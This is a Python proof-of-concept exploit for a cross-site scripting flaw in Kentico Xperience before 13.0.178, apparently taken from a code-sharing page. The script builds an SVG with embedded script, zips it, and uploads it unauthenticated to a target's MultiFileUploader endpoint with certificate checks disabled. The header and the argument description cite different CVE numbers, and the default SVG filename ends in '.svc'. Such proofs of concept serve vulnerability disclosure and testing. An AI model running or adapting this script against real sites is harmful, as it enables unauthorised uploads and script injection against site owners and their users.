扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS) # Date: 2025-05-09 # Version: Kentico Xperience before 13.0.178 # Exploit Author: Alex Messham # Contact: ramessham@gmail.com # Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/ # CVE: CVE-2025-32370 import requests import subprocess import os import argparse def create_svg_payload(svg_filename: str): print(f"[*] Writing malicious SVG to: {svg_filename}") svg_payload = '''<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("XSS"); </script> </svg> ''' with open(svg_filename, 'w') as f: f.write(svg_payload) def zip_payload(svg_filename: str, zip_filename: str): print(f"[*] Creating zip archive: {zip_filename}") subprocess.run(['zip', zip_filename, svg_filename], check=True) def upload_zip(zip_filename: str, target_url: str): full_url = f"{target_url}?Filename={zip_filename}&Complete=false" headers = { "Content-Type": "application/octet-stream" } print(f"[+] Uploading {zip_filename} to {full_url}") with open(zip_filename, 'rb') as f: response = requests.post(full_url, headers=headers, data=f, verify=False) if response.status_code == 200: print("[+] Upload succeeded") else: print(f"[-] Upload failed with status code {response.status_code}") print(response.text) if __name__ == "__main__": parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 - Unauthenticated ZIP file upload with embedded SVG for XSS.") parser.add_argument("--url", required=True, help="Target upload URL (e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)") parser.add_argument("--svg", default="poc.svc", help="SVG filename to embed inside the zip") parser.add_argument("--zip", default="exploit.zip", help="Name of the output zip file") args = parser.parse_args() create_svg_payload(args.svg) zip_payload(args.svg, args.zip) upload_zip(args.zip, args.url) ``` |
体验盒子
